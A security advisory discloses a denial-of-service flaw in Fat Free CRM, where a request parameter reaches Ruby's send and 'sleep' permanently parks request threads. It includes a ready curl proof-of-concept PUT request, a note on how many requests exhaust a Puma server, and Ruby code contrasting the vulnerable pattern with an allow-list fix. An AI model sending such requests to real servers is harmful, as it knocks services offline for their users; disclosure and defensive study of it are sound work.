Coordinated Disclosure Timeline

Summary

A denial of service vulnerability existed in Fat Free CRM where an authenticated attacker could have prevented the web application from handling any requests.

Product

Fat Free CRM

Tested Version

Details

Issue: Remote Denial of Service (GHSL-2022-073)

An authenticated user can perform a remote Denial of Service attack against Fat Free CRM. Fat Free CRM exposes several Task update endpoints that pass params[:bucket] to the bucket_empty? method, which calls send with the user-controllable bucket parameter as its argument. Ruby's send invokes any method on an object, public or private, including methods defined on ancestor classes such as Object and BasicObject. The Kernel module is included in Object, so its methods are available on every Ruby object, and every one of them is reachable through this send.

Most public information about this type of vulnerability names the Kernel methods exit and exit! as destructive examples to pass to send. In a Rails application, however, this raises an exception that aborts the current request but does not kill the server. We found that the Kernel method sleep is a better candidate for stopping a Rails application from answering requests: called without a duration argument, it makes the current request thread sleep forever, and that thread never returns to the pool.

So if a Rails application runs with at most 5 threads per worker (RAILS_MAX_THREADS=5) and 2 Puma workers (WEB_CONCURRENCY=2), 10 (2*5) such requests are enough to stop it from responding to any request at all.
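The dispatch pattern described above and an allow-listed replacement, as an added example: this is not Fat Free CRM's own code, and the module names, bucket names and task lists are constructed for the illustration. The probe runs each lookup under a deadline so the vulnerable variant cannot hang the script itself.

```ruby
# Added example, not Fat Free CRM's own code: the dispatch pattern behind
# GHSL-2022-073 reduced to a minimum, next to an allow-listed replacement.
# Bucket names and the sample task lists are constructed for this illustration.
require "timeout"

# Constructed sample data standing in for the Task scopes.
TASKS = { "due_today" => ["file report"], "due_tomorrow" => [] }.freeze

# Vulnerable shape: the request parameter names the method that gets called.
module UnsafeBuckets
  def self.due_today;    TASKS["due_today"];    end
  def self.due_tomorrow; TASKS["due_tomorrow"]; end

  # send dispatches any method the receiver has, private Kernel methods
  # included. "sleep" with no argument parks the calling thread forever.
  def self.bucket_empty?(bucket)
    send(bucket).empty?
  end
end

# Hardened shape: compare against a fixed list of bucket names first, so the
# parameter never reaches send unless it is one of the known scopes.
module SafeBuckets
  BUCKETS = %w[due_today due_tomorrow].freeze

  def self.due_today;    TASKS["due_today"];    end
  def self.due_tomorrow; TASKS["due_tomorrow"]; end

  def self.bucket_empty?(bucket)
    bucket = bucket.to_s
    raise ArgumentError, "unknown bucket #{bucket.inspect}" unless BUCKETS.include?(bucket)
    public_send(bucket).empty?
  end
end

# Calls bucket_empty? under a deadline so the vulnerable version cannot hang
# this script. Returns :empty, :not_empty, :rejected or :hung.
def probe(impl, bucket, deadline: 0.2)
  Timeout.timeout(deadline) { impl.bucket_empty?(bucket) ? :empty : :not_empty }
rescue Timeout::Error
  :hung
rescue ArgumentError, NoMethodError
  :rejected
end

if __FILE__ == $PROGRAM_NAME
  %w[due_today due_tomorrow sleep].each do |bucket|
    puts format("%-12s unsafe=%-10s safe=%s", bucket,
                probe(UnsafeBuckets, bucket), probe(SafeBuckets, bucket))
  end
end
```

Switching from send to public_send on its own is not a fix: it would reject sleep, which is a private Kernel method, but every public method of the receiver would still be callable with a name taken from the request. The allow-list check is what removes the attacker's control over the method name; public_send after it is only defence in depth.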

This vulnerability was found using a CodeQL query which identifies code injection.

Proof of concept

The following request sets params[:bucket] to sleep, which the application evaluates as send("sleep"):

curl -i -s -k -X $'PUT' \
    -H $'Host: 127.0.0.1:3000' -H $'Content-Length: 12' -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Connection: close' \
    -b $'_fat_free_crm_session=[..]' \
    --data-binary $'bucket=sleep' \
    $'http://127.0.0.1:3000/tasks/26/complete'

(Hint: replace the X-CSRF-Token header and the _fat_free_crm_session cookie with valid values from an authenticated session. The Content-Length must match the body; bucket=sleep is 12 bytes.)

Impact

This issue may lead to Denial of Service (DoS): each request parks one request thread permanently, and once every thread of every worker is parked the application no longer answers any request.

Resources

CVE

Credit

This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-073 in any communication regarding this issue.